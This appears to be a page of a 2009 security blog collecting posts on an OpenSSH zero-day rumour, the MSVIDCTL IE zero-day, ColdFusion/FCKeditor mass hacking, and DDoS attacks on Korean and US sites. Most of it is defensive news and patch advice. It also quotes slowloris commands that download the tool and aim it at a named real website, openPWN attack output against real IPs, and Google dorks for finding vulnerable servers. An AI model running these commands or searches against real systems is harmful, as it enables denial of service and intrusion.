security - Page 4

  • update your openssh now if you didn't since february

    OpenSSH prior to version 5.2 is vulnerable to the protocol weakness described in CPNI-957037 "Plaintext Recovery Attack Against SSH". However, based on the limited information available it appears that this described attack is infeasible in most circumstances. For more information please refer to the cbc.adv advisory and the OpenSSH 5.2 release notes.
    http://www.openssh.org/security.html

  • Orange day : New Mac malware found

    Do not think that it doesn't exist and that you can download with a mac whatever you want

    "We recently received a new sample of the Mac malware OSX/Puper.a. This file [MD5 Sum: 428143005E07E510302BA431FE0C28CC], which disguises itself as a Mac Cinema Installer, was recently mentioned in PC Magazine.
    http://www.trustedsource.org/blog/267/Variant-of-Mac-Malware-Another-Party-Puper

  • more detailed and practical information (blocklist) about the attacks

    We are now looking for blocklists to block the sites that are using the zeroday or are doing the SSH attacks.

    Those will be published on http://insecure.skynetblogs.be

    You should also follow the dashboard on  http://www.netvibes.com/mailforlen and use there for example my links to see the articles and so on in the segment security. If you click on security in general you will see a general dashboard and you could follow a few other things as well.

     

  • SNORT RULE FOR THE MICROSOFT ZERODAY IE attack

     IDS/IPS signatures, I would highly suggest looking for the malformed file vs trying to catch every permutation of the JS/Html seen.  Emerging threats has a signature that looks for the malformed file, it can be found in their main rules file.   2009493 - ET CURRENT_EVENTS Likely MSVIDCTL.dll exploit in transit (emerging.rules)


    http://isc.sans.org/diary.html?storyid=6739

  • Source of attacktools against older OpenSSH is found (by another)

    “./0pen0wn” or “./0penPWN” by the hacker group called “anti-sec.” Check the commands below:

    anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt
    	[+] openPWN - anti-sec group
    [+] Target: 66.96.220.213
    [+] SSH Port: 2222
    [+] List: users.txt

    [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

    and:


    anti-sec: ~ / pwn / xpl # ./0pen0wn-h 66.197.143.133-p 22
    [+] 0wn0wn – anti-sec group [+] 0wn0wn - anti-sec group
    [+] Target: 66.197.143.133 [+] Target: 66.197.143.133
    [+] SSH Port: 22 [+] SSH Port: 22
    [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

    Two attack logs exist on the net with this supposed exploit, both by this group. The first is an attack on an Astalavista Admin:

    http://romeo.copyandpaste.info/txt/nowayout.txt

    The second attack is the one the Internet Storm Center blogged on which can be seen in its entirety here:

    http://tinyurl.com/l8tzba

    and a Russian site has a play by play of the attack here:

    http://tinyurl.com/m7cqdh


    http://www.securityaegis.com/?p=445 (source of this info, very very good work man)

    now maybe you find some of this stuff in your logs. Update OPENSSH now.

  • DDOS a DNS server of an ISP : easy and efficient

    and we continue the orange day

    " MANY OF Eircom’s 500,000 internet subscribers have been left offline or experienced delays in web browsing at times this week because of a suspected attack by hackers.

    Some customers who tried to connect to popular sites such as RTÉ, Facebook or Bebo were redirected to incorrect websites, often displaying images of advertising or scantily clad women.

    The company blamed the problems on “an unusual and irregular volume of internet traffic” directed at its website, which affected the systems and servers that provide access to the internet for its customers.

    Internet discussion groups speculated that the problems were caused by a hacker accessing Eircom’s domain name server (DNS) system through a denial-of-service attack."
    http://www.irishtimes.com/newspaper/ireland/2009/0708/1224250235657.html

    They should be behind different routers at different parts of the network and with load balancing and failover procedures. If they are concentrated they are vulnerable. It is easier to attack a DDOS with half a million zombies than some website. The advantage is that you can disturb the traffic (stop) or redirect it if you use some special attacks (to a porn site for example). In the last case the investigators should follow the money.

  • DDOS attacks by zombie network against South Korea and US sites

     

    If your network or sites have regular connections to those sites in a way that is not normal, than you have infected zombies on your network

    [Attack site list]
    Cheong Wa Dae, the Ministry of National Defense, Foreign Affairs and Trade, Republic of Korea National Assembly, U.S. forces in Korea, Naver blog, Naver mail, bank, internet banking, internet banking, Shinhan Bank, Korea Exchange Bank, internet banking, the Grand National Party, the Chosun Ilbo, the auction

    Banking.nonghyup.com (bank, internet banking)
    Blog.naver.com (Naver blog)
    Ebank.keb.co.kr (Korea Exchange Bank Internet Banking)
    Ezbank.shinhan.com (Shinhan Bank, Internet Banking)
    Mail.naver.com (Naver Mail)
    Www.assembly.go.kr (Republic of Korea National Assembly)
    Www.auction.co.kr (auction)
    Www.chosun.com (Chosun Ilbo)
    Www.hannara.or.kr (GNP)
    Www.mnd.go.kr (Defense)
    Www.mofat.go.kr (Foreign Minister)
    Www.president.go.kr (Blue House)
    Www.usfk.mil (USFK)

    (Transformation may vary depending on the attack website)

    Finance.yahoo.com
    Travel.state.gov
    Www.amazon.com
    Www.dhs.gov
    Www.dot.gov
    Www.faa.gov
    Www.ftc.gov
    Www.nasdaq.com
    Www.nsa.gov
    Www.nyse.co
    Www.state.gov
    Www.usbank.com
    Www.usps.gov
    Www.ustreas.gov
    Www.voa.gov
    Www.voanews.com
    Www.whitehouse.gov
    Www.yahoo.com
    Www.washingtonpost.com
    Www.usauctionslive.com
    Www.defenselink.mil
    Www.marketwatch.com
    Www.site-by-site.com


    http://blogs.csoonline.com/list_of_us_south_korean_sites_targeted_in_ongoing_ddos

    Yep, we stay at orange  You will have to take care if you want to continue with the same insecure and unmonitored situation. Too much things are possible and too much things are happening at the same time.

  • Meanwhile you should also update your Open SSH

    There have been a splash of openssh attacks and scanning - even in Belgium - and nobody seems to know what and why. There are some rumors and there is some discussion over at the Internet Storm Center but it is not all clear yet. The rumor is that a Zero day has been discovered for OLDER versions of Open SSH. This means there is no patch - but you can upgrade which will solve the issue.

    I know it is a lot of work but it is work that you have to do otherwise there will be much more other work that you will have to do when you become the stupid victim of an announced attack.

    Do the right think. Upgrade to the latest versions

    ps what is strange about the openSSH scans is that they are scanning a whole set of ports, not only the traditional ones. Maybe to find the diverting tactics (by chosing another port not to be found while scanning). Means they are smart these guys.

    Rumor tells us that Black Hat US may be the place where more information would be launched about this attack. That promises. It looks like this blackhat conference will become a hell of a show (anyone interested in sponsering my trip :) )

     

  • We are orange for now

    This to show that this is important, very important and that you should take this with the uttermost urgency and importance and do the necessary things now and not later.

    You have only a very limited timeframe.

    once the professionals step in it is too late.

    and fridays are always very popular days for malware campaigns

  • and maybe keep away from the chinese web

    it is for the moment the main starting point of these infections and the redirects in other software goes to Chinese sites (you can block for example everything .cn with the exception of those sites that your surely need).

    and the Chinese web is by al means one of the most infected and dangerous around, even more than Russia ever was. So going from blacklisting some .cn sites to whitelisting only the good .cn sites is a normal thing to do until they clean up their act.

    This doesn't mean that soon these drive by attacks will pop up anywhere else.

    It is just something you can do now and that will enhance your security afterwards also.

  • more news on this new big vulnerability

    It is used as a drive-by install/infection when you visit compromised sites (and as so many sites have such a lousy security and don't care a bit, there are enough normal and trusted sites that could be compromised to install this or to redirect their visitors to downloadsites.

    There are already different versions and attacks underway

    "Samples seen thus far are being detected as Exp/VidCtl-A and Mal/JSShell-D. Several new variants of the exploit scripts are being proactively detected with these names"
    http://www.sophos.com/blogs/sophoslabs//?p=5199

    After the infection they are trying to download other malware of which some may be detected. The goal is not to infect your machine with it, it is to make your machine ready to receive a whole lot of other malware. It is like smashing a window to let the real thiefs in.

    Some sites are already hosting examples of how it works

    "Metasploit has a module ready for it (can't link while at work).
    POC exploit that pops up calc.exe
    another POC

    A couple bits of yoinked code. I don't recommend running these as they are both taken from live sites hosting bad stuff (the links here are just fine though!):
    http://en.securitylab.ru/poc/extra/382195.php
    http://4lt4l.blogspot.com/2009/07/directshow-0day-in-wild.html"
    http://www.terminal23.net/2009/07/links_and_info_about_directsho.html source

    and the solution is easy - just kill it because

    ""During the investigation, we identified that none of the ActiveX Control Objects hosted by msvidctl.dll are meant to be used in IE," Microsoft's Chengyun Chi wrote on the company's Security Research & Defense blog. "Therefore we recommend to kill-bit all of these controls."
    http://www.technewsworld.com/rsstory/67532.html?wlc=1247006193

    but hey shouldn't we than do a real cleanup of all other dead code or code that only a small percentage of the people use and they should activate while for all others it is desactivated.

    Be very careful with clicking on links while you are using IE.

    For the moment the malware that is served is old stuff, so for the moment it are amateurs that are doing these attacks. But when the professionals will have their work ready and figured out how to do it massively and without being detected and how to make a lot of cash out of it, than it is a whole other ballgame.

    Meanwhile you have a very small timeframe to get your network or computer protected. Kill the code. NOW

     

     

  • Your antivirus will NOT protect you against this attack for the moment

    Antivirus   Version   Last Update   Result
    a-squared 4.5.0.18 2009.07.05 -
    AhnLab-V3 5.0.0.2 2009.07.05 -
    AntiVir 7.9.0.204 2009.07.03 HTML/Shellcode.Gen
    Antiy-AVL 2.0.3.1 2009.07.03 -
    Authentium 5.1.2.4 2009.07.04 -
    Avast 4.8.1335.0 2009.07.04 -
    AVG 8.5.0.386 2009.07.05 -
    BitDefender 7.2 2009.07.05 -
    CAT-QuickHeal 10.00 2009.07.03 -
    ClamAV 0.94.1 2009.07.03 -
    Comodo 1538 2009.07.02 -
    DrWeb 5.0.0.12182 2009.07.05 -
    eSafe 7.0.17.0 2009.07.02 -
    eTrust-Vet 31.6.6596 2009.07.03 -
    F-Prot 4.4.4.56 2009.07.04 -
    F-Secure 8.0.14470.0 2009.07.05 -
    Fortinet 3.117.0.0 2009.07.03 -
    GData 19 2009.07.05 -
    Ikarus T3.1.1.64.0 2009.07.05 -
    Jiangmin 11.0.706 2009.07.05 -
    K7AntiVirus 7.10.783 2009.07.03 -
    Kaspersky 7.0.0.125 2009.07.05 -
    McAfee 5666 2009.07.04 -
    McAfee+Artemis 5666 2009.07.04 -
    McAfee-GW-Edition 6.8.5 2009.07.05 Heuristic.BehavesLike.JS.BufferOverflow.A
    Microsoft 1.4803 2009.07.05 Exploit:JS/ShellCode.gen
    NOD32 4217 2009.07.04 -
    Norman 6.01.09 2009.07.04 -
    nProtect 2009.1.8.0 2009.07.05 -
    Panda 10.0.0.14 2009.07.04 -
    PCTools 4.4.2.0 2009.07.03 -
    Prevx 3.0 2009.07.05 -
    Rising 21.36.62.00 2009.07.05 -
    Sophos 4.43.0 2009.07.05 -
    Sunbelt 3.2.1858.2 2009.07.05 -
    Symantec 1.4.4.12 2009.07.05 -
    TheHacker 6.3.4.3.362 2009.07.04 -
    TrendMicro 8.950.0.1094 2009.07.04 -
    VBA32 3.12.10.7 2009.07.05 -
    ViRobot 2009.7.3.1818 2009.07.03 -
    VirusBuster 4.6.5.0 2009.07.04 JS.BOFExploit.Gen
    http://www.csis.dk/en/news/news.asp?tekstID=799&side=1

    You should update your antivirus and set the update of your antivirus as short as possible so that all updates for all versions of this attack can be included and distributed.

  • urgent remove active x support in Internet Explorer - keep an eye on windows update

    There are attacks underway that use a real zero day - this is to say that there is NO patch, only this workaround. The attacks are real and they will be increasing and it will take some time before Microsoft has a patch ready that will satisfy all different users (no critique because other firms with less complex environments and products take sometimes much longer for even acknowledging that there is a problem).

    Microsoft has promised that an update will be underway soon but if you have critical machines (or use firefox for the moment if you have both on your machine - I also switch between the two all the time depending on the issues and sites).

    The systems affected are 

    • Microsoft Windows Server 2003 Service Pack 2, when used with:
      • Microsoft Windows Server 2003, Standard Edition (32-bit x86)
      • Microsoft Windows Server 2003, Enterprise Edition (32-bit x86)
      • Microsoft Windows Server 2003, Datacenter Edition (32-bit x86)
      • Microsoft Windows Server 2003, Web Edition
      • Microsoft Windows Server 2003, Datacenter x64 Edition
      • Microsoft Windows Server 2003, Enterprise x64 Edition
      • Microsoft Windows Server 2003, Standard x64 Edition
      • Microsoft Windows XP Professional x64 Edition
      • Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems
      • Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems
    • Microsoft Windows XP Service Pack 2, when used with:
      • Microsoft Windows XP Home Edition
      • Microsoft Windows XP Professional
    • Microsoft Windows XP Service Pack 3, when used with:
      • Microsoft Windows XP Home Edition
      • Microsoft Windows XP Professional

    But also read this and you know it is for nearly all the machines

    " Though unaffected by this vulnerability, Microsoft is recommending that Windows Vista and Windows Server 2008 customers remove support for this ActiveX Control within Internet Explorer using the same Class Identifiers as a defense-in-depth measure.
    http://www.microsoft.com/technet/security/advisory/972890.mspx"

    For those Microsoft has published this page with an online tool that will activate the fix automatically or the things you have to do if you want to do ityourself. A very nice idea by the way, should become common ground with all software security emergency workarounds.

    A reminder : In windows 2003 and the newest Internet Explorer and Outlook most websites are opened as restricted which mitigates the vulnerability. But as nobody is really sure what the attack does and how it works and if it does the same on all the different machines and infection possibilities, you can't be sure for the moment.

    It is never a good idea to use a critical machine to do websurfing. Surely not now.

    Everybody is rising the alertlevel. I know it is a holiday but please do what the security people are advising. It they take the time to put such an alert out than this is really dangerous stuff that could develop in a very dangerous situation.

    We will keep on reporting on Belsec - as this situation is serious and needs frontpage attention (if infection goes massive the lists and other indicators will go to security alerts).

    You can read this also http://www.iss.net/threats/329.html it says that attacks have been going on since the 11th of june but I presume they now become so massive that it is time to alert and to go beyond the normal patch routine.

    Prepare yourself for an immediate distribution of the patch on all your machines from the moment it is delivered. Organize your services, prepare the patching for your servers (maybe restart is necessary) and your laptops. This is a very good exercise.

     

     

     

  • online holiday fraud : easier to stop than thought

    Some articles are appearing about dutch sites that are being used as a vehicle to rent appartements and houses in holiday countries that they don't have. So when the final departuredates start, the sites disappear and the money is gone. (in the case of morairaway.com the fraud is about 3.2 million euro).

    In Belgium holiday operators have to be licensed. Licensed holiday operators have also an insurance and there is a special commission if you have complaints.

    So you better stay with big operators or those linked with big travel operators (like railways and airlines) or those that have also an offline certified existence.

    But it shouldn't be too difficult to put up a certification procedure for online .be holiday operators. You still would have to include some privacy and security provisions but for the rest it would be more or less identical to the offline certification.

    They are doing it for the pharmaceutical sector.

    So why wait for Europe if you can do it yourself

  • Did major economic espionage at Goldman disturb trading for weeks ?

    It is a story that is bubbling underneath, just waiting to burst open. For more info you should read the original post. THis is the main argument and facts.

    "In the 5 days immediately preceeding his departure from "Financial Institution" (potentially GS), Sergey allegedly downloaded 32 megs of ultra top-secret quant trading proprietary code, that, according to Special Agent McSwain's affidavit, he then proceeded to encrypt and upload to a website in Germany, with a UK owner. One can only imagine the value of this "code" not only to Goldman but to the highest bidder. After all, from the affidavit: "certain features of the [code], such as speed and efficiency by which it obtains and processes market data, gives the Financial Institution a competitive advantage among other firms that also engage in high-volume automated trading.The Financial Institution further believes that, if competing firms were to obtain the [code] and use its features, the Financial Institution's ability to profit from the [code]'s speed and efficiency would be significantly diminished." Needless to say, many others are now also likely hot on the trail of the code....

    Now the real question here is, does [GS?] feel lucky? Because the code has supposedly been in the hands of an outsider for over a month, one might suspect that anyone who wanted to has had ample opportunity - if the holder(s) wished to sell... Would that have anything to do with the even weirder than usual market action over the past 2-3 weeks: after all it is the very Goldman Sachs (which may or may not be the target of this program trading industrial espionage) which is the primary SLP on the world's biggest stock exchange.
    http://zerohedge.blogspot.com/2009/07/is-case-of-quant-trading-industrial.html

    just a few remarks

    * the person was informed of his departure and still had access to the network and such information ? And the access codes and encyrption wasn't changed when it became clear that someone was going to leave the firm.

    * ultra secretive code that can be uploaded and decoded is not ultra secretive. For ultra secretive you need to have three things. (where (in the office) who (your biometrics) and what (your smartcard)) otherwise it is just secret or confidential but not ultra secretive. It may be that but it was not treated as such. Ultra secretive stuff never leaves the office. That is why it is ultra secretive.

  • twitter network and services face a month of bugs

    http://twitpwn.com/

    A month of the twitter bugs is organized on this blogs and the worms are coming out of the can, but there are already two very interesting things to say

    * the importance of XSS bugs can not be underestimated and it is a pity the applications and communications between the applications were not tested before for these bugs. There are already enough tools to do that. It should become necessary in every webdeployment.

    * the ease with which access to the twitter network is given to other applications that not necessarily abide by the same or any securityrule is a big risk for such an important network. Some certification and communication guidelines should be developed if the network is going to survive.

    It is also remarkable that so many bugs can be fixed in less than 24h. It makes you wonder why they didn't do this before launching their webservice.

    Web2.0 : there are worms and holes and something rotten but they are hidden under a new look and feel.

    btw I like the idea of the month of bugs because it mobilizes attention and new tests and attack possibilities. It was a year ago that during the month of EID we discovered not only that all the propaganda was crap but that the securityconcepts were crap and that the hardware infrastructure for the users was not certified and sometimes even not safe. Since than not much has changed.....

  • millions of belgian webpages on coldfusion

    nearly 4 million coldfusion pages in Belgium under the .be domain

    and there are some really interesting sites

    do not think that the hackers aren't exploring this already

    we have seen it with Joomla - in the next days this can take much more volume and intensity than now

    you can check your own site/domain with subsites like this site:xxx.xx filetype:cfm

    If you want to find the pages that are Belgian but that don't have the .be domain, you can find them like that  filetype:cfm -site:be

    after that this vulnerabiity has been found and that hackers have discovered that it is an easy prey like Joomla was and still is, you shouldn't be astonished that the number of attacks and vulnerability research and exploit production will only increase

    is this the beginning of the end or will they start developing securitymonitoring tools and patching and best of practices for coldfusion or will they just let it desintegrate under the splatch of attacks underway and to come ?

     

  • URGENT COLDFUSION MASSIVE HACKING UNDERWAY (all the info to protect here)

    Some versions of Cold Fusion are actively being hacked on a great scale because there is a vulnerability in some part of their software

    http://isc.sans.org/diary.html?storyid=6715

    or because it has been activated on the new 8.01 and later versions to make it easier to upload files (for hackers and scammers)

    This is important because the compromised servers are being fully hacked and can't be recovered

    "This attack is still spreading rapidly, and most servers I’ve checked out after the injections were completely irrecoverable. After exploiting the JSP vulnerability, the attacker(s) often install rootkits, viruses, FSO shells/exploits, and backdoors other than the wminotify and webshells WeWatch pointed out. They’ll delete all of your site logs and shut off IIS logging with the webshell so you can’t see how they compromised your box.
    http://badwarebusters.org/main/itemview/5298" (there are some codes that protect you that are available here)

    But the security tips that could have prevented were already published in 2006

    and hosters are also going down like this one

    one attacker using it  has his list here (enormous)

    another injection is happening by injecting this domain chanm.3322.org but the Badware busters from Google are already informed

    and some more injection domains

    2288.org
    6600.org
    7766.org
    8800.org
    8866.org
    9966.org

    and how do they find the vulnerability ? only by Googling for example for this

    allinurl:  "FCKeditor editor filemanager connectors cfm"

    The solution is here

    http://www.codfusion.com/blog/post.cfm/cf8-and-fckeditor-security-threat

    and here on Adobe Forums

    and this is official from the module FCK

    and from coldfusion official

    very important source here and read the comments

    and also read this for the MIME attack version against coldfusion

    You should always upgrade every module of webapplication you have. The more you have, the more you will have to follow, close and upgrade. Less is more (security).

     

     

  • slowiris being developed and becoming more perfect - are you ready ?

    The Iranian cyberwar soldiers have a problem. They can't use a general DDOS even against a specific site because that would hamper the opposition who has to get their stuff out at all time. It is the only way by which information can be distributed fast enough. So luckily (act of god ? :)) slowiris came along. This makes it possible to DDOS a site without even using more connections than an normal website visit. But the code has been opensourced and as the hackers said could be made much better.

    Well you shouldn't have told that to the Iranians of which there are many geeks and computercodefreaks (and very intelligent by the way :)) So as they are now knocked off the streets and silenced in the media they can only wage their opposition online while waiting for the next opportunity to make their opposition and views known.

    Meanwhile for us as security administrators it is a bit disconcerting to see a crappy code being developed into a very forcefull attack code that could be used by anyone against anything for any reason and against which there is until now not much you could do.

    Yes, there is one thing : be sure to have a version of your website on IIS as backup if you site would be attacked and knocked out. It is a design failure of Sun, squid and Apache and a bunch of others that isn't present in IIS. Although take the latest versions of IIS and windows2008 and desactivate webdav and use the securitytools from Microsoft to secure and close down your site. Do not think you are smarter than Microsoft by opening up stuff or activating things you probably don't need.

    You have to follow our dijgo links at our dashboard to find the references to that new attack code that you can't stop for the moment with an anti-ddos protection and that bypasses the existing protection modules for Apache.

    For the moment it is becoming as simple as this (with the perl version installed)

        > perl slowloris.pl -dns WEBSITE -port 80 -timeout 626 -num 2000 -tcpto 5 -httpready

    >>100612

    and there goes your website - under the load of one machine with one adsl if you are running Apache....

    and for Mac (yes it is perl so it is for any machine)

    "To run slowloris.pl on Mac OS X, open Terminal and type this (hit return at the end of each line):

    mkdir -p ~/Source && cd ~/Source/
    curl -O http://ha.ckers.org/slowloris/slowloris.pl
    chmod +x slowloris.pl
    ./slowloris.pl --dns www.gerdab.ir" or any other site

  • Belgian ecrime 2 180.000 Belgian creditcards hacked

    in 2008 Card stop blocked around 900.000 Belgian creditcards but 80% was the result of loss (or just not finding it around the house and just blocking it as a preventive measure as you have to declare it within 24h) or theft.

    There are about 13 million creditcards in Belgium, which means that during a year one in 13 more or less is being blocked and changed.

    The other fact that is going under the radar (but this is why we are here) is that around 180.000 Belgian creditcards have been blocked preventively by Atos and the banks themselves. This means that the cards have been in online databases of creditcards that have been hacked or on listings that were compromised or were found in listings that were being sold on the cardercommunities. Or because they were seeing transactions that were not normal and imposed an immediate dramatic action.